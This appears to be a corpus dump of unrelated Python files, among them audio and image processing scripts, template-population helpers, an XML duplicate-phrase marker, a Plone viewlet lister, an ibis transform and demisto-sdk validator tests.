# Swath codes
from . import Q2011280003000_L2_EVSCI_V1_2
|
994,279 | ca7b5e1fa0ba4697d4e2104c97e1808edff95fb0 | import os
import operator
# Walk the by-speaker corpus and emit one compute_mfcc(...) call per .wav
# that has a matching .opa alignment file, using the alignment's first and
# last timestamps as the MFCC window.
root = r'/Users/michaelpuncel/Desktop/Spring2013/6.345/speech-authentication/by_speaker/'
# open() replaces the Python-2-only file() builtin.
matlab_script = open(r'/Users/michaelpuncel/Desktop/Spring2013/6.345/speech-authentication/matlab_scripts/mfcc_saver.m', 'w')
# NOTE(review): ``root`` is rebound by the outer walk, so the inner paths are
# relative to the directory currently being visited — confirm this is intended.
for root, dirs, files in os.walk(root):
    for dir in dirs:
        for root2, dirs2, files2 in os.walk(os.path.join(root, dir)):
            for filename in files2:
                if filename.endswith('.wav'):
                    try:
                        opa_file = open(root + dir + '/' + filename[0:-4] + '.opa')
                    except IOError:
                        # no alignment file for this recording — skip it
                        continue
                    with opa_file:  # previously leaked; now closed deterministically
                        lines = opa_file.readlines()
                    first_line = lines[0]
                    last_line = lines[-1]
                    # walk back over trailing blank lines to the last real entry
                    foo = 1
                    while last_line == '\n':
                        last_line = lines[-1 - foo]
                        foo += 1
                    start_index = first_line.split(' ')[0]
                    end_index = last_line.split(' ')[1]
                    matlab_script.write('compute_mfcc(\'%s\', \'%s\', \'%s\', %s, %s)' % (dir, filename[0: -4] + '.mat', filename, start_index, end_index))
                    matlab_script.write('\n')
matlab_script.close()
|
994,280 | 0c95519365f06508adb87e3f065cc498690d1197 | from fdx_color_extractor import FdxColorExtractor
import sys
import click
import os
import json
# Make the core package importable when the CLI is run from this directory.
sys.path.append('../core')
@click.command()
@click.option('--swatch', '-s', default=False, help='True, True indicates images are swatch images')
@click.option('--image', '-i', help='path of the image')
@click.option('--dir', '-d', help='path of the directory')
@click.option('--out', '-o', default=None, help='Name of the output file')
def compute(swatch, image, dir, out):
    """ Command Line Interface for color extractor wraps on top of the core app.
    Parameters
    ----------
    swatch: boolean
        True indicates the image is swatch image and vice versa
    image: str
        Path to the image
    dir: str
        Path to the directory
    out: str
        Path to the output file to which output would be printed
    """
    # --image wins over --dir, preserving the original if/elif precedence.
    path = image or dir
    if not path:
        # nothing to process (and no stray empty output file is created)
        return
    if out:
        # Pass the str path directly (the old ``out.encode('utf-8')`` handed
        # open() a bytes path) and close the file when done instead of leaking it.
        with open(out, 'w') as print_to:
            compute_results(path, swatch, print_to)
    else:
        compute_results(path, swatch, sys.stdout)
def compute_results(path, swatch, print_to):
    """
    gets the rgb, hsl values and hasl tags for all images using extract method of FdxColorExtractor and prints the image_path
    and the above values as a json record
    Parameters
    ----------
    path : str
        The path to the directory or the path of an image
    swatch : boolean
        True indicates image is a swatch image and vice versa
    print_to : File/sys.stdout
        The file to which ouput needs to be printed to
    """
    file_urls = get_images(path)
    for file_url in file_urls:
        # gets the fdxcolorextractor object containing color palette
        color_palette = FdxColorExtractor(file_url, swatch).extract()
        # gets the dictionary part of the object
        color_palette_dict = color_palette.__dict__
        # dumps to json asking the encoder to take dict form of every object
        # (nested palette objects are serialized via their __dict__ too)
        color_palette_jsondump = json.dumps(color_palette_dict, default=lambda o: o.__dict__)
        print(color_palette_jsondump, file=print_to)
def get_images(path):
    """
    Gets paths of all images in a given directory or a list containing one image if the given path is that of an image
    Parameters
    ----------
    path : The path to the directory or the path of an image
    Returns
    -------
    images : list of all images (empty when *path* is a non-image file)
    """
    exts = {'.png', '.jpg', '.jpeg'}
    if os.path.isfile(path):
        _, file_ext = os.path.splitext(path)
        # Return [] (not None, as before) for non-image files so callers can
        # always iterate the result; extension match is case-insensitive.
        return [path] if file_ext.lower() in exts else []
    images = []
    for file in get_files(path):
        _, file_ext = os.path.splitext(file)
        if file_ext.lower() in exts:
            images.append(file)
    return images
def get_files(path):
    """
    Gets paths of all files in a given directory (recursively)
    Parameters
    ----------
    path : The path to the directory
    Returns
    -------
    files : list of all files
    """
    files = []
    for dirpath, _, filenames in os.walk(path):
        # removed the pointless ``[f for f in filenames]`` copy
        for filename in filenames:
            files.append(os.path.join(dirpath, filename))
    return files
if __name__ == "__main__":
    compute()  # click parses the command-line arguments
|
994,281 | 6c939a68c27a67db4bc4278b1480b9b2cff3d6d2 | from colorama import init, Fore
import os
from string import Formatter
import random
from .support import merge
def get_field_value(field_name, mapping):
    """Resolve a dotted *field_name* (e.g. ``"a.b.c"``) against nested
    mappings.

    Returns ``(value, True)`` on success, or ``(field_name, False)`` when any
    path segment is missing or a non-mapping is indexed along the way.
    """
    try:
        # Iterative walk replaces the original inner recursion.
        value = mapping
        for part in field_name.split('.'):
            value = value[part]
        return value, True
    except (KeyError, TypeError, IndexError):
        # narrowed from a bare ``except:`` so real bugs still propagate
        return field_name, False
def str_format_map(format_string, mapping):
    """Like ``format_string.format_map(mapping)`` but tolerant: unknown
    fields are re-emitted verbatim as '{field!conv:spec}', and dotted field
    paths are resolved through nested mappings via get_field_value().

    NOTE(review): ``text`` is unbound if the very first parsed chunk has no
    field (field_name is None before any assignment) — confirm inputs always
    contain at least one field, or this raises NameError.
    """
    f = Formatter()
    parsed = f.parse(format_string)
    output = []
    for literal_text, field_name, format_spec, conversion in parsed:
        # rebuild the '!conv' / ':spec' suffixes for possible re-emission
        conversion = '!' + conversion if conversion is not None else ''
        format_spec = ':' + format_spec if format_spec else ''
        if field_name is not None:
            field_value, found = get_field_value(field_name, mapping)
            if not found:
                # unknown field: put the placeholder back unchanged
                text = '{{{}{}{}}}'.format(field_value,
                                           conversion,
                                           format_spec)
            else:
                # known field: apply its conversion/spec to the value
                format_string = '{{{}{}}}'.format(conversion, format_spec)
                text = format_string.format(field_value)
        output.append(literal_text + text)
        text = ''
    return ''.join(output)
def populate_object(script, data={}):
    """Return a copy of *script* (a possibly nested dict) with every string
    value containing '{...}' formatted against *data* via str_format_map().

    Formatting errors are reported in red (colorama) and the value is left
    unchanged. Note: only the top level is copied (``dict(**script)``);
    nested dicts are mutated in place and remain shared with the input.
    """
    def recursive_populate(script, data):
        variables = data #safedotdict(**data)
        if isinstance(script, dict):
            for (key, value) in script.items():
                if isinstance(value, str):
                    if '{' in value and '}' in value:
                        try:
                            new_value = str_format_map(value, variables)
                            script[key] = new_value
                        except Exception as e:
                            # report and keep the original value
                            init(autoreset=True)
                            print(Fore.RED + 'error in {},\n{}'.format(value, e))
                else:
                    # recurse into nested containers
                    recursive_populate(script[key], data)
        else:
            return
    script_copy = dict(**script)
    recursive_populate(script_copy, data)
    return script_copy
def populate_string( yaml_string, data={}):
    """
    max one {{ }} per line!

    Replace the first '{{ expr }}' on each line with the result of evaluating
    ``expr`` (via xeval) against *data* merged with os.environ. Raises if any
    expression cannot be evaluated.
    """
    def replace_in_line(line):
        # skip lines where a '#' comment starts before the placeholder
        if '{{' in line and '}}' in line and not ('#' in line and line.index('#') < line.index('{{')):
            begin = line.index('{{')
            end = line.index('}}', begin)
            variable_name = line[begin:end].strip().replace('{{','').replace('}}','').strip()
            try:
                return (
                    line[:begin].replace('{{','').replace('}}','') +
                    str(xeval(variable_name, merge(data, os.environ))) +
                    line[end:].replace('}}','').replace('{{','')
                )
            except Exception:
                # was a bare ``except:`` with an unused locate_variable() call
                raise Exception('yaml file needs all data to be evaluated: {{{{ {} }}}}'.format(variable_name))
        else:
            return line
    new_lines = list(map(replace_in_line, yaml_string.splitlines()))
    return '\n'.join(new_lines)
def locate_variable(script):
    """Return the name inside the first '{{ ... }}' placeholder in *script*."""
    opener = script.index('{{')
    closer = script.index('}}', opener)
    inner = script[opener:closer]
    return inner.replace('{{', '').strip()
def xeval(expr, data):
    """Evaluate *expr* with ``random`` and ``env`` (os.environ) in scope,
    plus every key of *data* as a variable. Prints and re-raises on failure.

    SECURITY: this is a raw eval() — never feed it untrusted expressions.
    """
    try:
        # commented-out User/Story/Media/... bindings removed as dead code
        return eval(expr, dict(
            random=random,
            env=os.environ,
            **data,
        ))
    except Exception as e:
        print(f'error {e} in xeval for {expr}')
        raise
|
994,282 | 55ae25b40552d541b917af7ebc3aa1de4e4ca3d6 | from models import Advertiser
from models.ad import Ad
if __name__ == '__main__':
    # Smoke-test script exercising the Advertiser/Ad model APIs.
    advertiser1 = Advertiser('name1')
    advertiser2 = Advertiser('name2')
    ad1 = Ad(title='title1', image_url='image-url1', link='link1', advertiser=advertiser1)
    ad2 = Ad(title='title2', image_url='image-url2', link='link2', advertiser=advertiser2)
    ad2.describe_me()
    advertiser1.describe_me()
    # record some views and clicks so the counters printed below have data
    ad1.inc_views()
    ad1.inc_views()
    ad1.inc_views()
    ad1.inc_views()
    ad2.inc_views()
    ad1.inc_clicks()
    ad1.inc_clicks()
    ad2.inc_clicks()
    # rename advertiser2 and verify the getter reflects it
    print(advertiser2.get_name())
    advertiser2.set_name('new name')
    print(advertiser2.get_name())
    # per-ad, per-advertiser, and global click counters
    print(ad1.get_clicks())
    print(advertiser2.get_clicks())
    print(Advertiser.get_total_clicks())
print(Advertiser.help()) |
994,283 | cfa9d3f6348637835af0313b8c6a14c5c9274d1b | #Autor: Felipe Gomez Portugal
#
# Reads distance and fuel used, then reports fuel efficiency (km per liter).
km = float(input("Teclea el numero de km recorridos: "))
lt = int(input("Teclea el numero de litros de gasolina usados: "))
# The original source ended mid-assignment; completed with the obvious
# km-per-liter computation and a result printout.
rendimiento = km / lt
print("Rendimiento:", rendimiento, "km por litro")
994,284 | 8c648c168d08eb1b65e8ff11c98d57a7f00984b9 | #!/usr/bin/env python
"""
mark-duplicate-phrases.py: mark duplicate sequences of n words
usage: mark-duplicate-phrases.py file1.xml [file2.xml ...]
notes:
* divides body texts in texts (original) and dups (duplicates)
* ref attributes contain message ids and word ids (n.m)
20190723 erikt(at)xs4all.nl
"""
import sys
import xml.etree.ElementTree as ET
BODY = "Body"        # XML tag of a message body element
MESSAGE = "Message"  # XML tag of a message element
N = 16               # phrase length (in words) used for duplicate detection
# phrase text -> number of times seen across all processed messages
phraseFrequencies = {}
# phrase text -> ref id (file.messageId.wordIndex) of its first occurrence
phraseInitialPos = {}
def makeRefId(fileName,message,i):
    """Build a reference id: <file>.<message id>.<1-based word index>."""
    return "{}.{}.{}".format(fileName, message.attrib["id"], i + 1)
def countPhrases(fileName,message):
    """Scan the message body for N-word phrases already seen (in any message
    processed so far) and return parallel lists of duplicate word ranges:
    (start indices, end indices, ref ids of the first occurrences).

    Updates the module-level phraseFrequencies / phraseInitialPos tables.

    NOTE(review): the loop bound ``len(words)-N`` skips the final phrase
    starting at index len(words)-N — possibly an off-by-one; confirm intent.
    """
    global phraseFrequencies,phraseInitialPos
    words = message.text.split()
    inDuplicate = False
    duplicateStarts,duplicateEnds,duplicateRefs = [],[],[]
    for i in range(0,len(words)-N):
        phrase = " ".join(words[i:i+N])
        if phrase in phraseFrequencies:
            phraseFrequencies[phrase] += 1
            if not inDuplicate:
                # entering a duplicate run: record where it starts and where
                # this phrase was first seen
                inDuplicate = True
                duplicateStarts.append(i)
                duplicateRefs.append(phraseInitialPos[phrase])
        else:
            phraseFrequencies[phrase] = 1
            phraseInitialPos[phrase] = makeRefId(fileName,message,i)
            if inDuplicate:
                # a fresh phrase closes the run; the last duplicated word is
                # the end of the previous N-word window (i-1 + N-1)
                inDuplicate = False
                duplicateEnds.append(i+N-2)
    # a run still open at end-of-text extends to the last word
    if inDuplicate: duplicateEnds.append(len(words)-1)
    return(duplicateStarts,duplicateEnds,duplicateRefs)
def markDuplicates(message,duplicateStarts,duplicateEnds,duplicateRefs):
    """Rewrite the message body as alternating <text>/<dup> sub-elements,
    wrapping each duplicate word range in <dup ref="..."> (ref points at the
    first occurrence of the phrase). Consumes the three input lists.
    """
    words = message.text.split()
    message.text = ""
    wordIndex = 0
    while len(duplicateStarts) > 0:
        indexDuplicateStarts = duplicateStarts.pop(0)
        indexDuplicateEnds = duplicateEnds.pop(0)
        duplicateRef = duplicateRefs.pop(0)
        # original (non-duplicate) text before this duplicate, if any
        if indexDuplicateStarts > wordIndex:
            text = ET.SubElement(message,"text")
            text.text = " ".join(words[wordIndex:indexDuplicateStarts])
        # the duplicate span itself (skipped when empty)
        if indexDuplicateStarts < indexDuplicateEnds:
            dup = ET.SubElement(message,"dup")
            dup.text = " ".join(words[indexDuplicateStarts:indexDuplicateEnds+1])
            dup.attrib["ref"] = duplicateRef
        wordIndex = indexDuplicateEnds+1
    # trailing original text after the last duplicate
    if wordIndex < len(words):
        text = ET.SubElement(message,"text")
        text.text = " ".join(words[wordIndex:])
def convertMessages(fileName,messages):
    """Mark duplicate phrases in every non-empty message body, in date order."""
    for key in sorted(messages):
        body = messages[key]
        if body.text is not None:
            starts, ends, refs = countPhrases(fileName, body)
            markDuplicates(body, starts, ends, refs)
def getMessages(root):
    """Map DateSent text -> Body element for every Message under *root*,
    assigning each body a 1-based ``id`` attribute.

    Exits the program with a diagnostic if a message lacks DateSent/Body.
    NOTE(review): messages sharing a DateSent overwrite each other — confirm
    timestamps are unique in the corpus.
    """
    messages = {}
    idCounter = 0
    for message in root.findall(".//"+MESSAGE):
        try:
            dateSent = message.findall("./"+"DateSent")[0].text
            messages[dateSent] = message.findall("./"+BODY)[0]
            idCounter += 1
            messages[dateSent].attrib["id"] = str(idCounter)
        except Exception as e:
            # str(message): Element cannot be concatenated to str directly,
            # so the original error path itself raised TypeError
            sys.exit("error processing message "+str(message)+" "+str(e))
    return(messages)
def makeOutputFileName(fileName):
    """Insert '-dup' before the file extension: 'x.xml' -> 'x-dup.xml'."""
    parts = fileName.split(".")
    parts[-2] = parts[-2] + "-dup"
    return ".".join(parts)
def main(argv):
    """Process each XML file named in argv[1:]: mark duplicate phrases in
    its message bodies and write the result to the '-dup' output file."""
    # fix: honour the argv parameter instead of silently reading sys.argv
    for fileName in argv[1:]:
        parser = ET.XMLParser(encoding="utf-8")
        tree = ET.parse(fileName,parser=parser)
        root = tree.getroot()
        messages = getMessages(root)
        # the output file name doubles as the ref-id prefix
        convertMessages(makeOutputFileName(fileName),messages)
        tree.write(makeOutputFileName(fileName))
if __name__ == "__main__":
    sys.exit(main(sys.argv))  # main returns None, so the exit status is 0
|
994,285 | 9f8d6d6a7b2a06ac1117f83b8ab6487fa1bef40a |
odd = list(range(1,20,2))
print("The first three numbers of the list are ")
print(odd[0:3])
print("\nThree items from the middle of the list are: ")
print(odd[3:7])
print("\nThe last three items in the list are: ")
print(odd[-3:])
|
994,286 | f18ea982bea51b04f9026d4461e8afb7b169897b | from Products.CMFCore.utils import getToolByName
import itertools
from zope.component import getGlobalSiteManager, getSiteManager
from zope.app.component.hooks import getSite
from plone.app.themeeditor.interfaces import IResourceType
from plone.app.themeeditor.interfaces import IResourceRegistration
from zope.interface import implements
from plone.app.customerize.registration import templateViewRegistrationInfos
from plone.memoize.instance import memoize
from five.customerize.interfaces import ITTWViewTemplate
from zope.viewlet.interfaces import IViewlet
# get translation machinery
from plone.app.themeeditor.interfaces import _
# borrow from plone message factory
from zope.i18n import translate
from zope.i18nmessageid import MessageFactory
PMF = MessageFactory('plone')
class ViewletResourceRegistration(object):
    """Value object describing one viewlet registration for the theme
    editor; the remaining attributes (name, description, actions, ...)
    are filled in by the code that enumerates registrations."""
    implements(IResourceRegistration)
    type = 'viewlet'
    icon = '/misc_/PageTemplates/zpt.gif'
class ViewletResourceType(object):
    """Enumerates viewlet registrations (filesystem-based and TTW-customized)
    as ViewletResourceRegistration records for the theme editor."""
    implements(IResourceType)
    name = 'viewlet'

    @memoize
    def layer_precedence(self):
        """Return the interface resolution order of the current request's
        provided interfaces (most specific layer first)."""
        request = getSite().REQUEST
        return list(request.__provides__.__iro__)

    def iter_viewlet_registrations(self):
        """Yield viewlet adapter registrations applicable to this request."""
        gsm = getGlobalSiteManager()
        sm = getSiteManager()
        layer_precedence = self.layer_precedence()
        for reg in itertools.chain(gsm.registeredAdapters(), sm.registeredAdapters()):
            # viewlets are multi-adapters on (context, request, view, manager)
            if len(reg.required) != 4:
                continue
            # skip registrations for layers not active on this request
            if reg.required[1] not in layer_precedence:
                continue
            if IViewlet.implementedBy(reg.factory) or ITTWViewTemplate.providedBy(reg.factory):
                yield reg

    def __iter__(self):
        """ Returns an iterator enumerating the resources of this type. """
        pvc = getToolByName(getSite(), 'portal_view_customizations')
        layer_precedence = self.layer_precedence()
        # sort by layer specificity, TTW-customized registrations first
        by_layer_precedence_and_ttwness = lambda x: (layer_precedence.index(x.required[1]), int(not ITTWViewTemplate.providedBy(x.factory)))
        regs = sorted(self.iter_viewlet_registrations(), key=by_layer_precedence_and_ttwness)
        for info in templateViewRegistrationInfos(regs, mangle=False):
            required = info['required'].split(',')
            res = ViewletResourceRegistration()
            res.name = info['viewname']
            res.context = required[0], required[3]
            if required[0] == 'zope.interface.Interface':
                res.description = 'Viewlet for *'
            else:
                res.description = u'Viewlet for %s' % required[0]
            res.description += ' in the %s manager' % required[3]
            res.layer = required[1]
            res.actions = []
            res.path = None
            res.customized = bool(info['customized'])
            res.tags = ['viewlet']
            if info['customized']:
                # TTW-customized: source lives in portal_view_customizations
                res.tags.append('customized')
                obj = getattr(pvc, info['customized'])
                res.text = obj._text
                res.path = '/'.join(obj.getPhysicalPath())
                res.info = translate(_(u"In the database",
                                       default=u"In the database: ${path}",
                                       mapping={u"path" : res.path}))
                res.actions.append((PMF(u'Edit'), obj.absolute_url() + '/manage_main'))
                remove_url = pvc.absolute_url() + '/manage_delObjects?ids=' + info['customized']
                res.actions.append((PMF(u'Remove'), remove_url))
            else:
                # filesystem template: offer a view/customize link
                res.info = translate(_('On the filesystem',
                                       default = u'On the filesystem: ${path}',
                                       mapping = {'path': info['zptfile']}))
                res.path = info['zptfile']
                view_url = pvc.absolute_url() + '/@@customizezpt.html?required=%s&view_name=%s' % (info['required'], info['viewname'])
                res.actions.append((PMF(u'View'), view_url))
            yield res

    def export(self, context):
        # Fix: the original ``raise NotImplemented`` raises the
        # NotImplemented *value*, which is not an exception and therefore
        # produces a TypeError at runtime; NotImplementedError is the
        # correct exception class.
        raise NotImplementedError
|
994,287 | b7bad52d6dad7825d53e6b8f072f79a70c02db58 | from moviepy.video.io.VideoFileClip import VideoFileClip
from image_processing import ImageProcessing
def video_processing(file_name):
    """Run ImageProcessing.invoke over every frame of *file_name* and write
    the annotated result to output_videos/<name>_result.mp4 (video only,
    audio dropped)."""
    result_path = "output_videos/" + file_name[:-4] + "_result.mp4"
    source_clip = VideoFileClip(file_name)
    processed_clip = source_clip.fl_image(ImageProcessing.invoke)
    processed_clip.write_videofile(result_path, audio=False)
994,288 | 5297e99caf896842a65cdfb5770128718ec7fc7d | import ibis
from ibis_vega_transform.util import promote_list
def collect(transform: dict, expr: ibis.Expr) -> ibis.Expr:
    """
    Apply a vega collect transform to an ibis expression.
    https://vega.github.io/vega/docs/transforms/collect/
    Parameters
    ----------
    transform: dict
        A JSON-able dictionary representing the vega transform.
    expr: ibis.Expr
        The expression to which to apply the transform.
    Returns
    -------
    transformed_expr: the transformed expression
    Raises
    ------
    ValueError
        If the transform specifies a different number of fields and orders.
    """
    fields = promote_list(transform["sort"]["field"])
    # default every field to ascending when no order is given
    orders = promote_list(transform["sort"].get("order", ["ascending"] * len(fields)))
    # explicit check instead of ``assert``, which vanishes under ``python -O``
    if len(fields) != len(orders):
        raise ValueError(
            "collect transform: 'field' and 'order' must have the same length"
        )
    # True = ascending, False = descending
    rules = [
        (field, order == "ascending")
        for field, order in zip(fields, orders)
    ]
    return expr.sort_by(rules)
|
994,289 | 0267a3c63e1df17450bcad885afa1da3325463a0 | import pytest
from demisto_sdk.commands.common.hook_validations.incident_field import (
GroupFieldTypes, IncidentFieldValidator)
from demisto_sdk.commands.common.hook_validations.structure import \
StructureValidator
from mock import patch
class TestIncidentFieldsValidator:
NAME_SANITY_FILE = {
'cliName': 'sanityname',
'name': 'sanity name',
'id': 'incident',
'content': True,
}
BAD_NAME_1 = {
'cliName': 'sanityname',
'name': 'Incident',
'content': True,
}
BAD_NAME_2 = {
'cliName': 'sanityname',
'name': 'case',
'content': True,
}
BAD_NAME_3 = {
'cliName': 'sanityname',
'name': 'Playbook',
'content': True,
}
GOOD_NAME_4 = {
'cliName': 'sanityname',
'name': 'Alerting feature',
'content': True,
}
BAD_NAME_5 = {
'cliName': 'sanity name',
'name': 'INciDeNts',
'content': True,
}
INPUTS_NAMES = [
(NAME_SANITY_FILE, False),
(BAD_NAME_1, True),
(BAD_NAME_2, True),
(BAD_NAME_3, True),
(GOOD_NAME_4, False),
(BAD_NAME_5, True)
]
@pytest.mark.parametrize('current_file, answer', INPUTS_NAMES)
def test_is_valid_name_sanity(self, current_file, answer):
import os
import sys
with patch.object(StructureValidator, '__init__', lambda a, b: None):
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
with open("file", 'w') as temp_out:
old_stdout = sys.stdout
sys.stdout = temp_out
validator.is_valid_name()
sys.stdout = old_stdout
with open('file', 'r') as temp_out:
output = temp_out.read()
assert ('IF100' in str(output)) is answer
# remove the temp file
os.system('rm -rf file')
CONTENT_1 = {
'content': True
}
CONTENT_BAD_1 = {
'content': False
}
CONTENT_BAD_2 = {
'something': True
}
INPUTS_FLAGS = [
(CONTENT_1, True),
(CONTENT_BAD_1, False),
(CONTENT_BAD_2, False)
]
@pytest.mark.parametrize('current_file, answer', INPUTS_FLAGS)
def test_is_valid_content_flag_sanity(self, current_file, answer):
with patch.object(StructureValidator, '__init__', lambda a, b: None):
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert validator.is_valid_content_flag() is answer
SYSTEM_FLAG_1 = {
'system': False,
'content': True,
}
SYSTEM_FLAG_BAD_1 = {
'system': True,
'content': True,
}
INPUTS_SYSTEM_FLAGS = [
(SYSTEM_FLAG_1, True),
(SYSTEM_FLAG_BAD_1, False)
]
@pytest.mark.parametrize('current_file, answer', INPUTS_SYSTEM_FLAGS)
def test_is_valid_system_flag_sanity(self, current_file, answer):
with patch.object(StructureValidator, '__init__', lambda a, b: None):
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert validator.is_valid_system_flag() is answer
VALID_CLINAMES_AND_GROUPS = [
("validind", GroupFieldTypes.INCIDENT_FIELD),
("validind", GroupFieldTypes.EVIDENCE_FIELD),
("validind", GroupFieldTypes.INDICATOR_FIELD)
]
@pytest.mark.parametrize("cliname, group", VALID_CLINAMES_AND_GROUPS)
def test_is_cliname_is_builtin_key(self, cliname, group):
with patch.object(StructureValidator, '__init__', lambda a, b: None):
current_file = {"cliName": cliname, "group": group}
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert validator.is_cliname_is_builtin_key()
INVALID_CLINAMES_AND_GROUPS = [
("id", GroupFieldTypes.INCIDENT_FIELD),
("id", GroupFieldTypes.EVIDENCE_FIELD),
("id", GroupFieldTypes.INDICATOR_FIELD)
]
@pytest.mark.parametrize("cliname, group", INVALID_CLINAMES_AND_GROUPS)
def test_is_cliname_is_builtin_key_invalid(self, cliname, group):
with patch.object(StructureValidator, '__init__', lambda a, b: None):
current_file = {"cliName": cliname, "group": group}
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert not validator.is_cliname_is_builtin_key()
VALID_CLINAMES = [
"agoodid",
"anot3erg00did",
]
@pytest.mark.parametrize("cliname", VALID_CLINAMES)
def test_matching_cliname_regex(self, cliname):
with patch.object(StructureValidator, '__init__', lambda a, b: None):
current_file = {"cliName": cliname}
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert validator.is_matching_cliname_regex()
INVALID_CLINAMES = [
"invalid cli",
"invalid_cli",
"invalid$$cli",
"לאסליטוב",
]
@pytest.mark.parametrize("cliname", INVALID_CLINAMES)
def test_matching_cliname_regex_invalid(self, cliname):
with patch.object(StructureValidator, '__init__', lambda a, b: None):
current_file = {"cliName": cliname}
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert not validator.is_matching_cliname_regex()
@pytest.mark.parametrize("cliname, group", VALID_CLINAMES_AND_GROUPS)
def test_is_valid_cliname(self, cliname, group):
current_file = {"cliName": cliname, "group": group}
with patch.object(StructureValidator, '__init__', lambda a, b: None):
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert validator.is_valid_cliname()
@pytest.mark.parametrize("cliname, group", INVALID_CLINAMES_AND_GROUPS)
def test_is_valid_cliname_invalid(self, cliname, group):
current_file = {"cliName": cliname, "group": group}
with patch.object(StructureValidator, '__init__', lambda a, b: None):
structure = StructureValidator("")
structure.current_file = current_file
structure.old_file = None
structure.file_path = "random_path"
structure.is_valid = True
structure.prev_ver = 'master'
structure.branch_name = ''
validator = IncidentFieldValidator(structure)
validator.current_file = current_file
assert not validator.is_valid_cliname()
data_is_valid_version = [
(-1, True),
(0, False),
(1, False),
]
@pytest.mark.parametrize('version, is_valid', data_is_valid_version)
def test_is_valid_version(self, version, is_valid):
structure = StructureValidator("")
structure.current_file = {"version": version}
validator = IncidentFieldValidator(structure)
assert validator.is_valid_version() == is_valid, f'is_valid_version({version}) returns {not is_valid}.'
IS_FROM_VERSION_CHANGED_NO_OLD = {} # type: dict[any, any]
IS_FROM_VERSION_CHANGED_OLD = {"fromVersion": "5.0.0"}
IS_FROM_VERSION_CHANGED_NEW = {"fromVersion": "5.0.0"}
IS_FROM_VERSION_CHANGED_NO_NEW = {} # type: dict[any, any]
IS_FROM_VERSION_CHANGED_NEW_HIGHER = {"fromVersion": "5.5.0"}
IS_CHANGED_FROM_VERSION_INPUTS = [
(IS_FROM_VERSION_CHANGED_NO_OLD, IS_FROM_VERSION_CHANGED_NO_OLD, False),
(IS_FROM_VERSION_CHANGED_NO_OLD, IS_FROM_VERSION_CHANGED_NEW, True),
(IS_FROM_VERSION_CHANGED_OLD, IS_FROM_VERSION_CHANGED_NEW, False),
(IS_FROM_VERSION_CHANGED_NO_OLD, IS_FROM_VERSION_CHANGED_NO_NEW, False),
(IS_FROM_VERSION_CHANGED_OLD, IS_FROM_VERSION_CHANGED_NEW_HIGHER, True),
]
@pytest.mark.parametrize("current_from_version, old_from_version, answer", IS_CHANGED_FROM_VERSION_INPUTS)
def test_is_changed_from_version(self, current_from_version, old_from_version, answer):
structure = StructureValidator("")
structure.old_file = old_from_version
structure.current_file = current_from_version
validator = IncidentFieldValidator(structure)
assert validator.is_changed_from_version() is answer
structure.quite_bc = True
assert validator.is_changed_from_version() is False
data_required = [
(True, False),
(False, True),
]
@pytest.mark.parametrize('required, is_valid', data_required)
def test_is_valid_required(self, required, is_valid):
structure = StructureValidator("")
structure.current_file = {"required": required}
validator = IncidentFieldValidator(structure)
assert validator.is_valid_required() == is_valid, f'is_valid_required({required})' \
f' returns {not is_valid}.'
data_is_changed_type = [
('shortText', 'shortText', False),
('shortText', 'longText', True),
('number', 'number', False),
('shortText', 'number', True),
('timer', 'timer', False),
('timer', 'number', True),
('timer', 'shortText', True),
('singleSelect', 'singleSelect', False),
('singleSelect', 'shortText', True)
]
@pytest.mark.parametrize('current_type, old_type, is_valid', data_is_changed_type)
def test_is_changed_type(self, current_type, old_type, is_valid):
structure = StructureValidator("")
structure.current_file = {"type": current_type}
structure.old_file = {"type": old_type}
validator = IncidentFieldValidator(structure)
assert validator.is_changed_type() == is_valid, f'is_changed_type({current_type}, {old_type})' \
f' returns {not is_valid}.'
structure.quite_bc = True
assert validator.is_changed_type() is False
TYPES_FROMVERSION = [
('grid', '5.5.0', 'indicatorfield', True),
('grid', '5.0.0', 'indicatorfield', False),
('number', '5.0.0', 'indicatorfield', True),
('grid', '5.0.0', 'incidentfield', True)
]
@pytest.mark.parametrize('field_type, from_version, file_type, is_valid', TYPES_FROMVERSION)
def test_is_valid_grid_fromversion(self, field_type, from_version, file_type, is_valid):
"""
Given
- an invalid indicator-field - the field is of type grid but fromVersion is < 5.5.0.
When
- Running is_valid_indicator_grid_fromversion on it.
Then
- Ensure validate fails on versions < 5.5.0.
"""
structure = StructureValidator("")
structure.file_type = file_type
structure.current_file = {"fromVersion": from_version, "type": field_type}
validator = IncidentFieldValidator(structure)
assert validator.is_valid_indicator_grid_fromversion() == is_valid, \
f'is_valid_grid_fromVersion({field_type}, {from_version} returns {not is_valid}'
|
994,290 | dadc65c3853ffda9e6a2973ab0bebf609e9d9b5c | import numpy as np
import matplotlib.pyplot as plt
import cluster_utils
from cluster_class import cluster_class
from cluster_class_bonus import cluster_class_bonus
from sklearn.cluster import KMeans
import plot
# Load train and test data (rows: samples; last column: integer class label).
train = np.load("../../Data/ECG/train.npy")
